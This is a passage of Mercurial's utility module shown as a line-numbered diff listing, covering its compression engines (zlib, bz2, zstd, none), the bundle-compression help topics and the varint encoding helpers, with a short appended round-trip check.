3432 3463 data = z.compress(chunk)
3433 3464 # Not all calls to compress emit data. It is cheaper to inspect
3434 3465 # here than to feed empty chunks through the generator.
3435 3466 if data:
3436 3467 yield data
3437 3468
3438 3469 yield z.flush()
3439 3470
3440 3471 def decompressorreader(self, fh):
3441 3472 return _GzipCompressedStreamReader(fh)
3442 3473
3443 3474 class zlibrevlogcompressor(object):
3444 3475 def compress(self, data):
3445 3476 insize = len(data)
3446 3477 # Caller handles empty input case.
3447 3478 assert insize > 0
3448 3479
3449 3480 if insize < 44:
3450 3481 return None
3451 3482
3452 3483 elif insize <= 1000000:
3453 3484 compressed = zlib.compress(data)
3454 3485 if len(compressed) < insize:
3455 3486 return compressed
3456 3487 return None
3457 3488
3458 3489 # zlib makes an internal copy of the input buffer, doubling
3459 3490 # memory usage for large inputs. So do streaming compression
3460 3491 # on large inputs.
3461 3492 else:
3462 3493 z = zlib.compressobj()
3463 3494 parts = []
3464 3495 pos = 0
3465 3496 while pos < insize:
3466 3497 pos2 = pos + 2**20
3467 3498 parts.append(z.compress(data[pos:pos2]))
3468 3499 pos = pos2
3469 3500 parts.append(z.flush())
3470 3501
3471 3502 if sum(map(len, parts)) < insize:
3472 3503 return ''.join(parts)
3473 3504 return None
3474 3505
3475 3506 def decompress(self, data):
3476 3507 try:
3477 3508 return zlib.decompress(data)
3478 3509 except zlib.error as e:
3479 3510 raise error.RevlogError(_('revlog decompress error: %s') %
3480 3511 stringutil.forcebytestr(e))
3481 3512
3482 3513 def revlogcompressor(self, opts=None):
3483 3514 return self.zlibrevlogcompressor()
3484 3515
3485 3516 compengines.register(_zlibengine())
3486 3517
3487 3518 class _bz2engine(compressionengine):
3488 3519 def name(self):
3489 3520 return 'bz2'
3490 3521
3491 3522 def bundletype(self):
3492 3523 """An algorithm that produces smaller bundles than ``gzip``.
3493 3524
3494 3525 All Mercurial clients should support this format.
3495 3526
3496 3527 This engine will likely produce smaller bundles than ``gzip`` but
3497 3528 will be significantly slower, both during compression and
3498 3529 decompression.
3499 3530
3500 3531 If available, the ``zstd`` engine can yield similar or better
3501 3532 compression at much higher speeds.
3502 3533 """
3503 3534 return 'bzip2', 'BZ'
3504 3535
3505 3536 # We declare a protocol name but don't advertise by default because
3506 3537 # it is slow.
3507 3538 def wireprotosupport(self):
3508 3539 return compewireprotosupport('bzip2', 0, 0)
3509 3540
3510 3541 def compressstream(self, it, opts=None):
3511 3542 opts = opts or {}
3512 3543 z = bz2.BZ2Compressor(opts.get('level', 9))
3513 3544 for chunk in it:
3514 3545 data = z.compress(chunk)
3515 3546 if data:
3516 3547 yield data
3517 3548
3518 3549 yield z.flush()
3519 3550
3520 3551 def decompressorreader(self, fh):
3521 3552 return _BZ2CompressedStreamReader(fh)
3522 3553
3523 3554 compengines.register(_bz2engine())
3524 3555
3525 3556 class _truncatedbz2engine(compressionengine):
3526 3557 def name(self):
3527 3558 return 'bz2truncated'
3528 3559
3529 3560 def bundletype(self):
3530 3561 return None, '_truncatedBZ'
3531 3562
3532 3563 # We don't implement compressstream because it is hackily handled elsewhere.
3533 3564
3534 3565 def decompressorreader(self, fh):
3535 3566 return _TruncatedBZ2CompressedStreamReader(fh)
3536 3567
3537 3568 compengines.register(_truncatedbz2engine())
3538 3569
3539 3570 class _noopengine(compressionengine):
3540 3571 def name(self):
3541 3572 return 'none'
3542 3573
3543 3574 def bundletype(self):
3544 3575 """No compression is performed.
3545 3576
3546 3577 Use this compression engine to explicitly disable compression.
3547 3578 """
3548 3579 return 'none', 'UN'
3549 3580
3550 3581 # Clients always support uncompressed payloads. Servers don't because
3551 3582 # unless you are on a fast network, uncompressed payloads can easily
3552 3583 # saturate your network pipe.
3553 3584 def wireprotosupport(self):
3554 3585 return compewireprotosupport('none', 0, 10)
3555 3586
3556 3587 # We don't implement revlogheader because it is handled specially
3557 3588 # in the revlog class.
3558 3589
3559 3590 def compressstream(self, it, opts=None):
3560 3591 return it
3561 3592
3562 3593 def decompressorreader(self, fh):
3563 3594 return fh
3564 3595
3565 3596 class nooprevlogcompressor(object):
3566 3597 def compress(self, data):
3567 3598 return None
3568 3599
3569 3600 def revlogcompressor(self, opts=None):
3570 3601 return self.nooprevlogcompressor()
3571 3602
3572 3603 compengines.register(_noopengine())
3573 3604
3574 3605 class _zstdengine(compressionengine):
3575 3606 def name(self):
3576 3607 return 'zstd'
3577 3608
3578 3609 @propertycache
3579 3610 def _module(self):
3580 3611 # Not all installs have the zstd module available. So defer importing
3581 3612 # until first access.
3582 3613 try:
3583 3614 from . import zstd
3584 3615 # Force delayed import.
3585 3616 zstd.__version__
3586 3617 return zstd
3587 3618 except ImportError:
3588 3619 return None
3589 3620
3590 3621 def available(self):
3591 3622 return bool(self._module)
3592 3623
3593 3624 def bundletype(self):
3594 3625 """A modern compression algorithm that is fast and highly flexible.
3595 3626
3596 3627 Only supported by Mercurial 4.1 and newer clients.
3597 3628
3598 3629 With the default settings, zstd compression is both faster and yields
3599 3630 better compression than ``gzip``. It also frequently yields better
3600 3631 compression than ``bzip2`` while operating at much higher speeds.
3601 3632
3602 3633 If this engine is available and backwards compatibility is not a
3603 3634 concern, it is likely the best available engine.
3604 3635 """
3605 3636 return 'zstd', 'ZS'
3606 3637
3607 3638 def wireprotosupport(self):
3608 3639 return compewireprotosupport('zstd', 50, 50)
3609 3640
3610 3641 def revlogheader(self):
3611 3642 return '\x28'
3612 3643
3613 3644 def compressstream(self, it, opts=None):
3614 3645 opts = opts or {}
3615 3646 # zstd level 3 is almost always significantly faster than zlib
3616 3647 # while providing no worse compression. It strikes a good balance
3617 3648 # between speed and compression.
3618 3649 level = opts.get('level', 3)
3619 3650
3620 3651 zstd = self._module
3621 3652 z = zstd.ZstdCompressor(level=level).compressobj()
3622 3653 for chunk in it:
3623 3654 data = z.compress(chunk)
3624 3655 if data:
3625 3656 yield data
3626 3657
3627 3658 yield z.flush()
3628 3659
3629 3660 def decompressorreader(self, fh):
3630 3661 return _ZstdCompressedStreamReader(fh, self._module)
3631 3662
3632 3663 class zstdrevlogcompressor(object):
3633 3664 def __init__(self, zstd, level=3):
3634 3665 # TODO consider omitting frame magic to save 4 bytes.
3635 3666 # This writes content sizes into the frame header. That is
3636 3667 # extra storage. But it allows a correct size memory allocation
3637 3668 # to hold the result.
3638 3669 self._cctx = zstd.ZstdCompressor(level=level)
3639 3670 self._dctx = zstd.ZstdDecompressor()
3640 3671 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3641 3672 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3642 3673
3643 3674 def compress(self, data):
3644 3675 insize = len(data)
3645 3676 # Caller handles empty input case.
3646 3677 assert insize > 0
3647 3678
3648 3679 if insize < 50:
3649 3680 return None
3650 3681
3651 3682 elif insize <= 1000000:
3652 3683 compressed = self._cctx.compress(data)
3653 3684 if len(compressed) < insize:
3654 3685 return compressed
3655 3686 return None
3656 3687 else:
3657 3688 z = self._cctx.compressobj()
3658 3689 chunks = []
3659 3690 pos = 0
3660 3691 while pos < insize:
3661 3692 pos2 = pos + self._compinsize
3662 3693 chunk = z.compress(data[pos:pos2])
3663 3694 if chunk:
3664 3695 chunks.append(chunk)
3665 3696 pos = pos2
3666 3697 chunks.append(z.flush())
3667 3698
3668 3699 if sum(map(len, chunks)) < insize:
3669 3700 return ''.join(chunks)
3670 3701 return None
3671 3702
3672 3703 def decompress(self, data):
3673 3704 insize = len(data)
3674 3705
3675 3706 try:
3676 3707 # This was measured to be faster than other streaming
3677 3708 # decompressors.
3678 3709 dobj = self._dctx.decompressobj()
3679 3710 chunks = []
3680 3711 pos = 0
3681 3712 while pos < insize:
3682 3713 pos2 = pos + self._decompinsize
3683 3714 chunk = dobj.decompress(data[pos:pos2])
3684 3715 if chunk:
3685 3716 chunks.append(chunk)
3686 3717 pos = pos2
3687 3718 # Frame should be exhausted, so no finish() API.
3688 3719
3689 3720 return ''.join(chunks)
3690 3721 except Exception as e:
3691 3722 raise error.RevlogError(_('revlog decompress error: %s') %
3692 3723 stringutil.forcebytestr(e))
3693 3724
3694 3725 def revlogcompressor(self, opts=None):
3695 3726 opts = opts or {}
3696 3727 return self.zstdrevlogcompressor(self._module,
3697 3728 level=opts.get('level', 3))
3698 3729
3699 3730 compengines.register(_zstdengine())
3700 3731
3701 3732 def bundlecompressiontopics():
3702 3733 """Obtains a list of available bundle compressions for use in help."""
3703 3734 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3704 3735 items = {}
3705 3736
3706 3737 # We need to format the docstring. So use a dummy object/type to hold it
3707 3738 # rather than mutating the original.
3708 3739 class docobject(object):
3709 3740 pass
3710 3741
3711 3742 for name in compengines:
3712 3743 engine = compengines[name]
3713 3744
3714 3745 if not engine.available():
3715 3746 continue
3716 3747
3717 3748 bt = engine.bundletype()
3718 3749 if not bt or not bt[0]:
3719 3750 continue
3720 3751
3721 3752 doc = pycompat.sysstr('``%s``\n %s') % (
3722 3753 bt[0], engine.bundletype.__doc__)
3723 3754
3724 3755 value = docobject()
3725 3756 value.__doc__ = doc
3726 3757 value._origdoc = engine.bundletype.__doc__
3727 3758 value._origfunc = engine.bundletype
3728 3759
3729 3760 items[bt[0]] = value
3730 3761
3731 3762 return items
3732 3763
3733 3764 i18nfunctions = bundlecompressiontopics().values()
3734 3765
3735 3766 # convenient shortcut
3736 3767 dst = debugstacktrace
3737 3768
3738 3769 def safename(f, tag, ctx, others=None):
3739 3770 """
3740 3771 Generate a name that it is safe to rename f to in the given context.
3741 3772
3742 3773 f: filename to rename
3743 3774 tag: a string tag that will be included in the new name
3744 3775 ctx: a context, in which the new name must not exist
3745 3776 others: a set of other filenames that the new name must not be in
3746 3777
3747 3778 Returns a file name of the form oldname~tag[~number] which does not exist
3748 3779 in the provided context and is not in the set of other names.
3749 3780 """
3750 3781 if others is None:
3751 3782 others = set()
3752 3783
3753 3784 fn = '%s~%s' % (f, tag)
3754 3785 if fn not in ctx and fn not in others:
3755 3786 return fn
3756 3787 for n in itertools.count(1):
3757 3788 fn = '%s~%s~%s' % (f, tag, n)
3758 3789 if fn not in ctx and fn not in others:
3759 3790 return fn
3760 3791
3761 3792 def readexactly(stream, n):
3762 3793 '''read n bytes from stream.read and abort if less was available'''
3763 3794 s = stream.read(n)
3764 3795 if len(s) < n:
3765 3796 raise error.Abort(_("stream ended unexpectedly"
3766 3797 " (got %d bytes, expected %d)")
3767 3798 % (len(s), n))
3768 3799 return s
3769 3800
3770 3801 def uvarintencode(value):
3771 3802 """Encode an unsigned integer value to a varint.
3772 3803
3773 3804 A varint is a variable length integer of 1 or more bytes. Each byte
3774 3805 except the last has the most significant bit set. The lower 7 bits of
3775 3806 each byte store the 2's complement representation, least significant group
3776 3807 first.
3777 3808
3778 3809 >>> uvarintencode(0)
3779 3810 '\\x00'
3780 3811 >>> uvarintencode(1)
3781 3812 '\\x01'
3782 3813 >>> uvarintencode(127)
3783 3814 '\\x7f'
3784 3815 >>> uvarintencode(1337)
3785 3816 '\\xb9\\n'
3786 3817 >>> uvarintencode(65536)
3787 3818 '\\x80\\x80\\x04'
3788 3819 >>> uvarintencode(-1)
3789 3820 Traceback (most recent call last):
3790 3821 ...
3791 3822 ProgrammingError: negative value for uvarint: -1
3792 3823 """
3793 3824 if value < 0:
3794 3825 raise error.ProgrammingError('negative value for uvarint: %d'
3795 3826 % value)
3796 3827 bits = value & 0x7f
3797 3828 value >>= 7
3798 3829 bytes = []
3799 3830 while value:
3800 3831 bytes.append(pycompat.bytechr(0x80 | bits))
3801 3832 bits = value & 0x7f
3802 3833 value >>= 7
3803 3834 bytes.append(pycompat.bytechr(bits))
3804 3835
3805 3836 return ''.join(bytes)
3806 3837
3807 3838 def uvarintdecodestream(fh):
3808 3839 """Decode an unsigned variable length integer from a stream.
3809 3840
3810 3841 The passed argument is anything that has a ``.read(N)`` method.
3811 3842
3812 3843 >>> try:
3813 3844 ... from StringIO import StringIO as BytesIO
3814 3845 ... except ImportError:
3815 3846 ... from io import BytesIO
3816 3847 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3817 3848 0
3818 3849 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3819 3850 1
3820 3851 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3821 3852 127
3822 3853 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3823 3854 1337
3824 3855 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3825 3856 65536
3826 3857 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3827 3858 Traceback (most recent call last):
3828 3859 ...
3829 3860 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3830 3861 """
3831 3862 result = 0
3832 3863 shift = 0
3833 3864 while True:
3834 3865 byte = ord(readexactly(fh, 1))
3835 3866 result |= ((byte & 0x7f) << shift)
3836 3867 if not (byte & 0x80):
3837 3868 return result
3838 3869 shift += 7
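# Round-trip sketch: encoding then decoding recovers the original value.
from io import BytesIO
for value in (0, 1, 127, 128, 1337, 65536):
    assert uvarintdecodestream(BytesIO(uvarintencode(value))) == value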